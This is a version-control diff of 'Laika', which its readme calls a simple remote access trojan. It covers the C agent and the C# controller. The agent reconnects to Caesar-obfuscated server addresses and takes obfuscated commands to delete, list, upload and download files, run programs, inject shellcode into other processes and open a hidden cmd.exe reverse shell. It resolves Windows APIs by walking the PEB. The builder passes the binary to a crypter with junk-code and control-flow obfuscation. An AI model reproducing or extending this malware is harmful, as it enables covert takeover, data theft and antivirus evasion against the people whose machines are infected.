#endif
}
#endif
void* get_ntfunction(const char* func) { void* get_ntfunction(const char* func) {
PTEB tebPtr = GetTEB(); PTEB_ tebPtr = GetTEB();
PPEB_LDR_DATA ldrData = tebPtr->ProcessEnvironmentBlock->Ldr; PPEB_LDR_DATA ldrData = tebPtr->ProcessEnvironmentBlock->Ldr;
PLIST_ENTRY moduleList = &(ldrData->InMemoryOrderModuleList); PLIST_ENTRY moduleList = &(ldrData->InMemoryOrderModuleList);

102
Laika/libc.h
View File

@@ -1,17 +1,119 @@
#pragma once #pragma once
#include <Windows.h> #include <Windows.h>
//#include <winternl.h>
#include <stddef.h> #include <stddef.h>
extern HANDLE _crt_heap; extern HANDLE _crt_heap;
#ifndef _MSC_VER
#define LAIKA_NOOPT __attribute__((optimize("O0")))
#else
#define LAIKA_NOOPT
#endif
typedef long NTSTATUS;
#define FD_SET_(fd, set) do { \
if (((fd_set FAR *)(set))->fd_count < FD_SETSIZE) \
((fd_set FAR *)(set))->fd_array[((fd_set FAR *)(set))->fd_count++]=(fd);\
} while(0)
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING;
typedef UNICODE_STRING* PUNICODE_STRING;
typedef const UNICODE_STRING* PCUNICODE_STRING;
typedef struct _PEB_LDR_DATA {
BYTE Reserved1[8];
PVOID Reserved2[3];
LIST_ENTRY InMemoryOrderModuleList;
} PEB_LDR_DATA, * PPEB_LDR_DATA;
typedef struct _LDR_DATA_TABLE_ENTRY {
PVOID Reserved1[2];
LIST_ENTRY InMemoryOrderLinks;
PVOID Reserved2[2];
PVOID DllBase;
PVOID Reserved3[2];
UNICODE_STRING FullDllName;
BYTE Reserved4[8];
PVOID Reserved5[3];
union {
ULONG CheckSum;
PVOID Reserved6;
} DUMMYUNIONNAME;
ULONG TimeDateStamp;
} LDR_DATA_TABLE_ENTRY, * PLDR_DATA_TABLE_ENTRY;
typedef struct _RTL_USER_PROCESS_PARAMETERS {
BYTE Reserved1[16];
PVOID Reserved2[10];
UNICODE_STRING ImagePathName;
UNICODE_STRING CommandLine;
} RTL_USER_PROCESS_PARAMETERS, * PRTL_USER_PROCESS_PARAMETERS;
typedef
VOID
(NTAPI* PPS_POST_PROCESS_INIT_ROUTINE) (
VOID
);
typedef struct _PEB {
BYTE Reserved1[2];
BYTE BeingDebugged;
BYTE Reserved2[1];
PVOID Reserved3[2];
PPEB_LDR_DATA Ldr;
PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
PVOID Reserved4[3];
PVOID AtlThunkSListPtr;
PVOID Reserved5;
ULONG Reserved6;
PVOID Reserved7;
ULONG Reserved8;
ULONG AtlThunkSListPtr32;
PVOID Reserved9[45];
BYTE Reserved10[96];
PPS_POST_PROCESS_INIT_ROUTINE PostProcessInitRoutine;
BYTE Reserved11[128];
PVOID Reserved12[1];
ULONG SessionId;
} PEB, * PPEB;
typedef struct __TEB {
PVOID Reserved1[12];
PPEB ProcessEnvironmentBlock;
PVOID Reserved2[399];
BYTE Reserved3[1952];
PVOID TlsSlots[64];
BYTE Reserved4[8];
PVOID Reserved5[26];
PVOID ReservedForOle;
PVOID Reserved6[4];
PVOID TlsExpansionSlots;
} TEB_, * PTEB_;
#ifdef _M_X64
unsigned long long __readgsqword_(unsigned long long offset);
#else
unsigned long __readfsdword_(unsigned long offset);
#endif
char* strcpy_(char* dest, const char* src); char* strcpy_(char* dest, const char* src);
size_t strlen_(char* src); size_t strlen_(char* src);
int strncmp_(char* a, char* b, size_t size); int strncmp_(char* a, char* b, size_t size);
int strcmp_(const char* s1, const char* s2);
char* strcat_(char* dest, const char* src);
void *memset_(void* a, int val, size_t size); void *memset_(void* a, int val, size_t size);
size_t mbstowcs_(wchar_t* dest, const char* src, size_t n); size_t mbstowcs_(wchar_t* dest, const char* src, size_t n);
size_t wcstombs_(char* dest, const wchar_t* src, size_t n); size_t wcstombs_(char* dest, const wchar_t* src, size_t n);
int wcscmp_(const wchar_t* s1, const wchar_t* s2); int wcscmp_(const wchar_t* s1, const wchar_t* s2);
wchar_t* wcsstr_(const wchar_t* haystack, const wchar_t* needle); wchar_t* wcsstr_(const wchar_t* haystack, const wchar_t* needle);
wchar_t* wcscat_(wchar_t* dest, const wchar_t* src);
wchar_t* wcscpy_(wchar_t* dest, const wchar_t* src);
char** split_lines(const char* fileContent, int* lineCount); char** split_lines(const char* fileContent, int* lineCount);
void* my_GetProcAddress(HMODULE hModule, LPCSTR lpProcName); void* my_GetProcAddress(HMODULE hModule, LPCSTR lpProcName);
void* get_ntfunction(const char* func); void* get_ntfunction(const char* func);

70
Laika/main.c
View File

@@ -3,7 +3,7 @@
#include <Windows.h> #include <Windows.h>
#include <wininet.h> #include <wininet.h>
#include <shlobj_core.h> //#include <shlobj_core.h>
#include <stdio.h> #include <stdio.h>
#include "utils.h" #include "utils.h"
@@ -124,7 +124,7 @@ DWORD WINAPI watch_process(LPVOID lpParameter) {
} }
void SendShellEndedSignal(SOCKET sock) { void SendShellEndedSignal(SOCKET sock) {
if (Api.send(sock, "Qfnpf?%xjxxnts%jsiji", strlen("Qfnpf?%xjxxnts%jsiji"), 0) < 0) //Laika: session ended if (Api.send(sock, "Qfnpf?%xjxxnts%jsiji", strlen_("Qfnpf?%xjxxnts%jsiji"), 0) < 0) //Laika: session ended
{ {
//send failed //send failed
} }
@@ -132,13 +132,14 @@ void SendShellEndedSignal(SOCKET sock) {
int serv = -1; int serv = -1;
HANDLE _crt_heap = 0; HANDLE _crt_heap = 0;
int main(void) { int main(void) {
InitApis(); InitApis();
_crt_heap = Api.HeapCreate(0, 0, 0); _crt_heap = Api.HeapCreate(0, 0, 0);
wchar_t wtext[20]; wchar_t wtext[20];
mbstowcs_(wtext, CAESAR_DECRYPT("hri3j}j"), strlen(CAESAR_DECRYPT("hri3j}j")) + 1);//Plus null mbstowcs_(wtext, CAESAR_DECRYPT("hri3j}j"), strlen_(CAESAR_DECRYPT("hri3j}j")) + 1);//Plus null
LPWSTR cmd_char = wtext; LPWSTR cmd_char = wtext;
int sock = 0; int sock = 0;
@@ -167,9 +168,9 @@ retry:
//on fait une copie de l'ip chiffr<66>e, puis on la free_ //on fait une copie de l'ip chiffr<66>e, puis on la free_
//<2F>a <20>vite qu'elle reste dans la m<>moire trop longtemps //<2F>a <20>vite qu'elle reste dans la m<>moire trop longtemps
//<2F>a <20>vite aussi qu'on utilise CAESAR_DECRYPT sur une ip d<>j<EFBFBD> d<>crypt<70>e //<2F>a <20>vite aussi qu'on utilise CAESAR_DECRYPT sur une ip d<>j<EFBFBD> d<>crypt<70>e
size_t len = strlen(fallback_servers[serv]); size_t len = strlen_(fallback_servers[serv]);
char* Tmp = Api.HeapAlloc(_crt_heap, HEAP_ZERO_MEMORY, len + 1); char* Tmp = Api.HeapAlloc(_crt_heap, HEAP_ZERO_MEMORY, len + 1);
strcpy(Tmp, fallback_servers[serv]); strcpy_(Tmp, fallback_servers[serv]);
server.sin_addr.s_addr = Api.inet_addr(CAESAR_DECRYPT(Tmp)); server.sin_addr.s_addr = Api.inet_addr(CAESAR_DECRYPT(Tmp));
@@ -206,7 +207,7 @@ retry:
goto retry; goto retry;
} }
if (strncmp_(server_reply, "ijqdknqj", strlen("ijqdknqj")) == 0) { //del_file if (strncmp_(server_reply, "ijqdknqj", strlen_("ijqdknqj")) == 0) { //del_file
char* path = (char*)Api.HeapAlloc(_crt_heap, HEAP_ZERO_MEMORY, MAX_PATH); char* path = (char*)Api.HeapAlloc(_crt_heap, HEAP_ZERO_MEMORY, MAX_PATH);
//Receive a reply from the server //Receive a reply from the server
@@ -223,7 +224,7 @@ retry:
Api.Heapfree_(_crt_heap, 0, path); Api.Heapfree_(_crt_heap, 0, path);
} }
if (strncmp_(server_reply, "ijqdinw", strlen("ijqdinw")) == 0) { //del_dir if (strncmp_(server_reply, "ijqdinw", strlen_("ijqdinw")) == 0) { //del_dir
char* path = (char*)Api.HeapAlloc(_crt_heap, HEAP_ZERO_MEMORY, MAX_PATH); char* path = (char*)Api.HeapAlloc(_crt_heap, HEAP_ZERO_MEMORY, MAX_PATH);
//Receive a reply from the server //Receive a reply from the server
@@ -243,7 +244,7 @@ retry:
Api.Heapfree_(_crt_heap, 0, path); Api.Heapfree_(_crt_heap, 0, path);
} }
if (strncmp_(server_reply, "ljydtgodnskt", strlen("ljydtgodnskt")) == 0) { //get_obj_info if (strncmp_(server_reply, "ljydtgodnskt", strlen_("ljydtgodnskt")) == 0) { //get_obj_info
char* path = (char*)Api.HeapAlloc(_crt_heap, HEAP_ZERO_MEMORY, MAX_PATH); char* path = (char*)Api.HeapAlloc(_crt_heap, HEAP_ZERO_MEMORY, MAX_PATH);
//Receive a reply from the server //Receive a reply from the server
@@ -263,12 +264,12 @@ retry:
} }
} }
if (strncmp_(server_reply, "ljydiwn{jx", strlen("ljydiwn{jx")) == 0) { //get_drives if (strncmp_(server_reply, "ljydiwn{jx", strlen_("ljydiwn{jx")) == 0) { //get_drives
char* drives = (char*)Api.HeapAlloc(_crt_heap, HEAP_ZERO_MEMORY, MAX_PATH); char* drives = (char*)Api.HeapAlloc(_crt_heap, HEAP_ZERO_MEMORY, MAX_PATH);
get_drives_list(drives); get_drives_list(drives);
if (Api.send(sock, drives, strlen(drives), 0) < 0) { if (Api.send(sock, drives, strlen_(drives), 0) < 0) {
//send failed //send failed
Api.Heapfree_(_crt_heap, 0, drives); Api.Heapfree_(_crt_heap, 0, drives);
Sleep_(Sleep_TIME); Sleep_(Sleep_TIME);
@@ -278,7 +279,7 @@ retry:
Api.Heapfree_(_crt_heap, 0, drives); Api.Heapfree_(_crt_heap, 0, drives);
} }
if (strncmp_(server_reply, "j}jhzyj", strlen("j}jhzyj")) == 0) { //execute if (strncmp_(server_reply, "j}jhzyj", strlen_("j}jhzyj")) == 0) { //execute
char* path = (char*)Api.HeapAlloc(_crt_heap, HEAP_ZERO_MEMORY, MAX_PATH); char* path = (char*)Api.HeapAlloc(_crt_heap, HEAP_ZERO_MEMORY, MAX_PATH);
STARTUPINFOA si; STARTUPINFOA si;
PROCESS_INFORMATION pi; PROCESS_INFORMATION pi;
@@ -310,7 +311,7 @@ retry:
} }
#ifdef SHELLCODE #ifdef SHELLCODE
if (strncmp_(server_reply, "nsojhy", strlen("nsojhy")) == 0) { //inject if (strncmp_(server_reply, "nsojhy", strlen_("nsojhy")) == 0) { //inject
char* arch = (char*)Api.HeapAlloc(_crt_heap, HEAP_ZERO_MEMORY, 2); char* arch = (char*)Api.HeapAlloc(_crt_heap, HEAP_ZERO_MEMORY, 2);
if (Api.recv(sock, arch, 2, 0) <= 0) { if (Api.recv(sock, arch, 2, 0) <= 0) {
@@ -324,13 +325,13 @@ retry:
size_t fsize = 0; size_t fsize = 0;
char *file = upload_file_to_mem(sock, &fsize); char *file = upload_file_to_mem(sock, &fsize);
if (file == NULL) { if (file == NULL) {
Api.send(sock, "fail", strlen("fail"), 0); Api.send(sock, "fail", strlen_("fail"), 0);
Sleep_(Sleep_TIME); Sleep_(Sleep_TIME);
goto retry; goto retry;
} }
HANDLE proc = NULL; HANDLE proc = NULL;
if (strncmp_(arch, "32", strlen("32")) == 0) { if (strncmp_(arch, "32", strlen_("32")) == 0) {
proc = FindProcessByArch(L"x86"); proc = FindProcessByArch(L"x86");
} }
else { else {
@@ -340,7 +341,7 @@ retry:
Api.Heapfree_(_crt_heap, 0, arch); Api.Heapfree_(_crt_heap, 0, arch);
if (proc == NULL) { if (proc == NULL) {
Api.send(sock, "fail", strlen("fail"), 0); Api.send(sock, "fail", strlen_("fail"), 0);
Api.Heapfree_(_crt_heap, 0, file); Api.Heapfree_(_crt_heap, 0, file);
Sleep_(Sleep_TIME); Sleep_(Sleep_TIME);
goto retry; goto retry;
@@ -348,7 +349,7 @@ retry:
LPVOID addr = Api.VirtualAllocEx(proc, NULL, fsize, MEM_COMMIT, PAGE_EXECUTE_READWRITE); LPVOID addr = Api.VirtualAllocEx(proc, NULL, fsize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (addr == NULL) { if (addr == NULL) {
Api.send(sock, "fail", strlen("fail"), 0); Api.send(sock, "fail", strlen_("fail"), 0);
Api.Heapfree_(_crt_heap, 0, file); Api.Heapfree_(_crt_heap, 0, file);
Api.CloseHandle(proc); Api.CloseHandle(proc);
Sleep_(Sleep_TIME); Sleep_(Sleep_TIME);
@@ -356,7 +357,7 @@ retry:
} }
if (Api.WriteProcessMemory(proc, addr, file, fsize, NULL) == 0) { if (Api.WriteProcessMemory(proc, addr, file, fsize, NULL) == 0) {
Api.send(sock, "fail", strlen("fail"), 0); Api.send(sock, "fail", strlen_("fail"), 0);
Api.Heapfree_(_crt_heap, 0, file); Api.Heapfree_(_crt_heap, 0, file);
Api.CloseHandle(proc); Api.CloseHandle(proc);
Sleep_(Sleep_TIME); Sleep_(Sleep_TIME);
@@ -365,7 +366,7 @@ retry:
HANDLE hThread = Api.CreateRemoteThread(proc, NULL, 0, (LPTHREAD_START_ROUTINE)addr, NULL, 0, NULL); HANDLE hThread = Api.CreateRemoteThread(proc, NULL, 0, (LPTHREAD_START_ROUTINE)addr, NULL, 0, NULL);
if (hThread == NULL) { if (hThread == NULL) {
Api.send(sock, "fail", strlen("fail"), 0); Api.send(sock, "fail", strlen_("fail"), 0);
Api.Heapfree_(_crt_heap, 0, file); Api.Heapfree_(_crt_heap, 0, file);
Api.CloseHandle(proc); Api.CloseHandle(proc);
Sleep_(Sleep_TIME); Sleep_(Sleep_TIME);
@@ -375,10 +376,10 @@ retry:
Api.Heapfree_(_crt_heap, 0, file); Api.Heapfree_(_crt_heap, 0, file);
Api.CloseHandle(proc); Api.CloseHandle(proc);
Api.CloseHandle(hThread); Api.CloseHandle(hThread);
Api.send(sock, "ok", strlen("ok"), 0); Api.send(sock, "ok", strlen_("ok"), 0);
} }
#endif #endif
if (strncmp_(server_reply, "ljydknqjdqnxy", strlen("ljydknqjdqnxy")) == 0) { //get_file_list if (strncmp_(server_reply, "ljydknqjdqnxy", strlen_("ljydknqjdqnxy")) == 0) { //get_file_list
char* file_list = (char*)Api.HeapAlloc(_crt_heap, HEAP_ZERO_MEMORY, BUFFER_SIZE); char* file_list = (char*)Api.HeapAlloc(_crt_heap, HEAP_ZERO_MEMORY, BUFFER_SIZE);
char* path = (char*)Api.HeapAlloc(_crt_heap, HEAP_ZERO_MEMORY, MAX_PATH); char* path = (char*)Api.HeapAlloc(_crt_heap, HEAP_ZERO_MEMORY, MAX_PATH);
@@ -403,7 +404,7 @@ retry:
} }
if (Api.send(sock, file_list, strlen(file_list), 0) < 0) { if (Api.send(sock, file_list, strlen_(file_list), 0) < 0) {
//send failed //send failed
Api.Heapfree_(_crt_heap, 0, file_list); Api.Heapfree_(_crt_heap, 0, file_list);
Api.Heapfree_(_crt_heap, 0, path); Api.Heapfree_(_crt_heap, 0, path);
@@ -414,7 +415,7 @@ retry:
Api.Heapfree_(_crt_heap, 0, path); Api.Heapfree_(_crt_heap, 0, path);
} }
if (strncmp_(server_reply, "it|sqtfidknqj", strlen("it|sqtfidknqj")) == 0) { //download_file if (strncmp_(server_reply, "it|sqtfidknqj", strlen_("it|sqtfidknqj")) == 0) { //download_file
char* path = (char*)Api.HeapAlloc(_crt_heap, HEAP_ZERO_MEMORY, MAX_PATH); char* path = (char*)Api.HeapAlloc(_crt_heap, HEAP_ZERO_MEMORY, MAX_PATH);
//Receive a reply from the server //Receive a reply from the server
@@ -441,7 +442,7 @@ retry:
} }
} }
if (strncmp_(server_reply, "zuqtfidknqj", strlen("zuqtfidknqj")) == 0) { //upload_file if (strncmp_(server_reply, "zuqtfidknqj", strlen_("zuqtfidknqj")) == 0) { //upload_file
char* path = (char*)Api.HeapAlloc(_crt_heap, HEAP_ZERO_MEMORY, MAX_PATH); char* path = (char*)Api.HeapAlloc(_crt_heap, HEAP_ZERO_MEMORY, MAX_PATH);
//Receive a reply from the server //Receive a reply from the server
@@ -470,7 +471,7 @@ retry:
Api.Heapfree_(_crt_heap, 0, path); Api.Heapfree_(_crt_heap, 0, path);
} }
if (strncmp_(server_reply, "xmjqq", strlen("xmjqq")) == 0) { //shell if (strncmp_(server_reply, "xmjqq", strlen_("xmjqq")) == 0) { //shell
started = 0; started = 0;
// Set the socket as standard output and error // Set the socket as standard output and error
SECURITY_ATTRIBUTES sa; SECURITY_ATTRIBUTES sa;
@@ -478,14 +479,14 @@ retry:
sa.bInheritHandle = TRUE; sa.bInheritHandle = TRUE;
sa.lpSecurityDescriptor = NULL; sa.lpSecurityDescriptor = NULL;
if (!Api.CreatePipe(&g_hChildStd_OUT_Rd, &g_hChildStd_OUT_Wr, &sa, 0)) { if (!Api.CreatePipe(&g_hChildStd_OUT_Rd, &g_hChildStd_OUT_Wr, &sa, 0)) {
Api.send(sock, "fail", strlen("fail"), 0); Api.send(sock, "fail", strlen_("fail"), 0);
SendShellEndedSignal(sock); SendShellEndedSignal(sock);
Sleep_(Sleep_TIME); Sleep_(Sleep_TIME);
goto retry; goto retry;
} }
if (!Api.CreatePipe(&g_hChildStd_IN_Rd, &g_hChildStd_IN_Wr, &sa, 0)) { if (!Api.CreatePipe(&g_hChildStd_IN_Rd, &g_hChildStd_IN_Wr, &sa, 0)) {
Api.CloseHandle(g_hChildStd_IN_Rd); Api.CloseHandle(g_hChildStd_IN_Rd);
Api.send(sock, "fail", strlen("fail"), 0); Api.send(sock, "fail", strlen_("fail"), 0);
SendShellEndedSignal(sock); SendShellEndedSignal(sock);
Sleep_(Sleep_TIME); Sleep_(Sleep_TIME);
goto retry; goto retry;
@@ -497,7 +498,7 @@ retry:
if (hThread == NULL || hThread2 == NULL) { if (hThread == NULL || hThread2 == NULL) {
Api.CloseHandle(g_hChildStd_OUT_Wr); Api.CloseHandle(g_hChildStd_OUT_Wr);
Api.CloseHandle(g_hChildStd_IN_Rd); Api.CloseHandle(g_hChildStd_IN_Rd);
Api.send(sock, "fail", strlen("fail"), 0); Api.send(sock, "fail", strlen_("fail"), 0);
SendShellEndedSignal(sock); SendShellEndedSignal(sock);
Sleep_(Sleep_TIME); Sleep_(Sleep_TIME);
goto retry; goto retry;
@@ -516,7 +517,7 @@ retry:
memset_(&pi, 0, sizeof(PROCESS_INFORMATION)); memset_(&pi, 0, sizeof(PROCESS_INFORMATION));
if (!Api.CreateProcessW(NULL, cmd_char, NULL, NULL, TRUE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi)) { //cmd.exe if (!Api.CreateProcessW(NULL, cmd_char, NULL, NULL, TRUE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi)) { //cmd.exe
Api.send(sock, "fail", strlen("fail"), 0); Api.send(sock, "fail", strlen_("fail"), 0);
SendShellEndedSignal(sock); SendShellEndedSignal(sock);
Api.CloseHandle(g_hChildStd_OUT_Wr); Api.CloseHandle(g_hChildStd_OUT_Wr);
Api.CloseHandle(g_hChildStd_IN_Rd); Api.CloseHandle(g_hChildStd_IN_Rd);
@@ -594,11 +595,11 @@ retry:
} }
} }
if (strncmp_(server_reply, "ufxr", strlen("ufxr")) == 0) { //pasm if (strncmp_(server_reply, "ufxr", strlen_("ufxr")) == 0) { //pasm
size_t fsize = 0; size_t fsize = 0;
char* file = upload_file_to_mem(sock, &fsize); char* file = upload_file_to_mem(sock, &fsize);
if (file == NULL) { if (file == NULL) {
Api.send(sock, "fail", strlen("fail"), 0); Api.send(sock, "fail", strlen_("fail"), 0);
Sleep_(Sleep_TIME); Sleep_(Sleep_TIME);
goto retry; goto retry;
} }
@@ -606,7 +607,7 @@ retry:
int line_count = 0; int line_count = 0;
char** lines = split_lines(file, &line_count); char** lines = split_lines(file, &line_count);
if (lines == NULL) { if (lines == NULL) {
Api.send(sock, "fail", strlen("fail"), 0); Api.send(sock, "fail", strlen_("fail"), 0);
Api.Heapfree_(_crt_heap, 0, file); Api.Heapfree_(_crt_heap, 0, file);
Sleep_(Sleep_TIME); Sleep_(Sleep_TIME);
goto retry; goto retry;
@@ -614,7 +615,7 @@ retry:
pasm_run_script(NULL, lines, line_count, sock); pasm_run_script(NULL, lines, line_count, sock);
Api.send(sock, "Qfnpf?%jsi%tk%xhwnuy", strlen("Qfnpf?%jsi%tk%xhwnuy"), 0); //Laika: end of script Api.send(sock, "Qfnpf?%jsi%tk%xhwnuy", strlen_("Qfnpf?%jsi%tk%xhwnuy"), 0); //Laika: end of script
Api.Heapfree_(_crt_heap, 0, file); Api.Heapfree_(_crt_heap, 0, file);
if (lines != NULL) if (lines != NULL)
Api.Heapfree_(_crt_heap, 0, lines); Api.Heapfree_(_crt_heap, 0, lines);
@@ -628,6 +629,11 @@ retry:
return 0; return 0;
} }
extern void mainCRTStartup(void);
void mainCRTStartup(void) {
main();
}
/* /*
BOOL APIENTRY main(HMODULE hModule, BOOL APIENTRY main(HMODULE hModule,
DWORD ul_reason_for_call, DWORD ul_reason_for_call,

13
Laika/resolve_apis.h
View File

@@ -1,20 +1,21 @@
#pragma once #pragma once
#include <Windows.h> #include <Windows.h>
#include <shlobj_core.h> //#include <shlobj_core.h>
#include <TlHelp32.h> #include <TlHelp32.h>
#include <wininet.h> #include <wininet.h>
#include <winternl.h> //#include <winternl.h>
#include <winsock.h> #include <winsock.h>
#include "utils.h" #include "utils.h"
#include "libc.h"
#ifdef _M_X64 #ifdef _M_X64
#define GetTEB() ((PTEB)__readgsqword(FIELD_OFFSET(NT_TIB, Self))) #define GetTEB() ((PTEB_)__readgsqword_(FIELD_OFFSET(NT_TIB, Self)))
#else #else
#define GetTEB() ((PTEB)__readfsdword(FIELD_OFFSET(NT_TIB, Self))) #define GetTEB() ((PTEB_)__readfsdword_(FIELD_OFFSET(NT_TIB, Self)))
#endif #endif
typedef NTSTATUS(NTAPI* TRtlInitUnicodeString)(PUNICODE_STRING DestinationString, PCWSTR SourceString); typedef NTSTATUS(__stdcall* TRtlInitUnicodeString)(PUNICODE_STRING DestinationString, PCWSTR SourceString);
typedef NTSTATUS(NTAPI* TLdrLoadDll)(PWCHAR, ULONG, PUNICODE_STRING, PHANDLE); typedef NTSTATUS(__stdcall* TLdrLoadDll)(PWCHAR, ULONG, PUNICODE_STRING, PHANDLE);
typedef HMODULE(WINAPI* TLoadLibraryA)(LPCSTR); typedef HMODULE(WINAPI* TLoadLibraryA)(LPCSTR);
typedef BOOL(WINAPI* Tconnect)(SOCKET, const SOCKADDR*, int); typedef BOOL(WINAPI* Tconnect)(SOCKET, const SOCKADDR*, int);

6
Laika/utils.c
View File

@@ -6,7 +6,7 @@ extern API Api;
#define KEY 5 #define KEY 5
char* CAESAR(char* in) { char* CAESAR(char* in) {
for (size_t i = 0; i < strlen(in); i++) { for (size_t i = 0; i < strlen_(in); i++) {
in[i] += KEY; in[i] += KEY;
} }
@@ -14,7 +14,7 @@ char* CAESAR(char* in) {
} }
char* CAESAR_DECRYPT(char* in) { char* CAESAR_DECRYPT(char* in) {
for (size_t i = 0; i < strlen(in); i++) { for (size_t i = 0; i < strlen_(in); i++) {
in[i] -= KEY; in[i] -= KEY;
} }
@@ -23,7 +23,7 @@ char* CAESAR_DECRYPT(char* in) {
LPCWSTR ConvertCharToWChar(const char* str) LPCWSTR ConvertCharToWChar(const char* str)
{ {
int len = strlen(str) + 1; int len = strlen_(str) + 1;
int wlen = Api.MultiByteToWideChar(CP_ACP, 0, str, len, NULL, 0); int wlen = Api.MultiByteToWideChar(CP_ACP, 0, str, len, NULL, 0);
LPWSTR wstr = (LPWSTR)Api.HeapAlloc(_crt_heap, HEAP_ZERO_MEMORY, wlen * sizeof(WCHAR)); LPWSTR wstr = (LPWSTR)Api.HeapAlloc(_crt_heap, HEAP_ZERO_MEMORY, wlen * sizeof(WCHAR));
Api.MultiByteToWideChar(CP_ACP, 0, str, len, wstr, wlen); Api.MultiByteToWideChar(CP_ACP, 0, str, len, wstr, wlen);

26
Server/BuildMenu.cs
View File

@@ -204,8 +204,7 @@ namespace Server
#endif #endif
void api_{functionName}(void) {{ void api_{functionName}(void) {{
#ifdef _WIN32 #ifdef _WIN32
char api[] = ""{Utils.CAESAR(api.function_name)}""; f{api.function_name} p{api.function_name} = GetApi(L""{api.dll_name}"", ""{Utils.CAESAR(api.function_name)}"");
f{api.function_name} p{api.function_name} = GetApi(L""{api.dll_name}"", PCAESAR_DECRYPT(api));
if (p{api.function_name} == NULL) {{ if (p{api.function_name} == NULL) {{
state->STACK_IDX -= {api.arguments.Count}; state->STACK_IDX -= {api.arguments.Count};
{(returnsVoid ? string.Empty : "state->registers->eax = 1;")} {(returnsVoid ? string.Empty : "state->registers->eax = 1;")}
@@ -276,7 +275,8 @@ void api_{functionName}(void) {{
AppendApisToAPIC(); AppendApisToAPIC();
UpdateApiHeaderFile(); UpdateApiHeaderFile();
/*
button2.Text = "Building pasm..."; button2.Text = "Building pasm...";
button2.Update(); button2.Update();
@@ -308,6 +308,7 @@ void api_{functionName}(void) {{
button2.Text = "Building Laika..."; button2.Text = "Building Laika...";
button2.Update(); button2.Update();
*/
/* /*
startInfo.Arguments = "/C \"\"" + cmd_line + "\"\" ../Laika /p:Configuration=Release;Platform=x86"; startInfo.Arguments = "/C \"\"" + cmd_line + "\"\" ../Laika /p:Configuration=Release;Platform=x86";
startInfo.RedirectStandardError = true; startInfo.RedirectStandardError = true;
@@ -335,13 +336,30 @@ void api_{functionName}(void) {{
newContent += "};"; newContent += "};";
File.WriteAllText(filePath, newContent); File.WriteAllText(filePath, newContent);
/*
startInfo.Arguments = "/C \"\"" + cmd_line + "\"\" ../Laika /p:Configuration=Release;Platform=x86"; startInfo.Arguments = "/C \"\"" + cmd_line + "\"\" ../Laika /p:Configuration=Release;Platform=x86";
startInfo.RedirectStandardError = true; startInfo.RedirectStandardError = true;
process.StartInfo = startInfo; process.StartInfo = startInfo;
process.Start(); process.Start();
output += process.StandardOutput.ReadToEnd(); output += process.StandardOutput.ReadToEnd();
output += process.StandardError.ReadToEnd(); output += process.StandardError.ReadToEnd();
process.WaitForExit();
*/
button2.Text = "Building Laika...";
button2.Update();
System.Diagnostics.Process process = new System.Diagnostics.Process();
System.Diagnostics.ProcessStartInfo startInfo = new System.Diagnostics.ProcessStartInfo();
startInfo.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden;
startInfo.FileName = "cmd";
startInfo.Arguments = "/C cd ../Laika/ && mingw32-make fclean && mingw32-make";
startInfo.RedirectStandardOutput = true;
startInfo.UseShellExecute = false;
startInfo.CreateNoWindow = true;
process.StartInfo = startInfo;
process.Start();
output += process.StandardOutput.ReadToEnd();
process.WaitForExit(); process.WaitForExit();
if (!checkBox1.Checked) if (!checkBox1.Checked)
@@ -358,7 +376,7 @@ void api_{functionName}(void) {{
args += " --junk " + numericUpDown1.Value.ToString(); args += " --junk " + numericUpDown1.Value.ToString();
if (checkBox4.Checked) if (checkBox4.Checked)
args += " --control_flow " + numericUpDown2.Value.ToString(); args += " --control_flow " + numericUpDown2.Value.ToString();
if (pictureBox1.ImageLocation != "") if (pictureBox1.ImageLocation != "" && pictureBox1.ImageLocation != null)
args += " --icon " + pictureBox1.ImageLocation; args += " --icon " + pictureBox1.ImageLocation;
startInfo.Arguments = "/C cd ..\\patate-crypter\\Builder && python gui.py --file ..\\..\\bin\\Laika.exe" + args; startInfo.Arguments = "/C cd ..\\patate-crypter\\Builder && python gui.py --file ..\\..\\bin\\Laika.exe" + args;

6
Server/FileExplorer.cs
View File

@@ -123,6 +123,12 @@ namespace Server
comboBox1.Items.Add(l); comboBox1.Items.Add(l);
} }
comboBox1.SelectedIndex = 0; comboBox1.SelectedIndex = 0;
char d = comboBox1.Items.IndexOf(comboBox1.SelectedIndex).ToString()[0];
while ((d == 'A' || d == 'B') && (comboBox1.SelectedIndex + 1) < comboBox1.Items.Count)
{
comboBox1.SelectedIndex++;
d = comboBox1.Items.IndexOf(comboBox1.SelectedIndex).ToString()[0];
}
PATH = comboBox1.Text + ":/"; PATH = comboBox1.Text + ":/";
textBox1.Text = PATH; textBox1.Text = PATH;

2
Server/Menu.cs
View File

@@ -29,7 +29,7 @@ namespace Server
public static int localport; public static int localport;
public static void ServerStart() public static void ServerStart()
{ {
localip = Dns.GetHostEntry(Dns.GetHostName()).AddressList.FirstOrDefault(ip => ip.AddressFamily == System.Net.Sockets.AddressFamily.InterNetwork).ToString(); localip = "192.168.1.20";//Dns.GetHostEntry(Dns.GetHostName()).AddressList.FirstOrDefault(ip => ip.AddressFamily == System.Net.Sockets.AddressFamily.InterNetwork).ToString();
localport = 4444; localport = 4444;
server = new TcpListener(System.Net.IPAddress.Parse(localip), localport); server = new TcpListener(System.Net.IPAddress.Parse(localip), localport);
server.Start(); server.Start();

2
pasm

Submodule pasm updated: e5603117d4...fff046f860

2
patate-crypter

Submodule patate-crypter updated: 8fd24fc073...15c8e787e2

1
readme.md
View File

@@ -1,6 +1,7 @@
# Laika # Laika
A very simple RAT I created for fun.<br> A very simple RAT I created for fun.<br>
You need mingw32 and Visual Studio 2022's clang to compile the agent btw.<br>
# Agent # Agent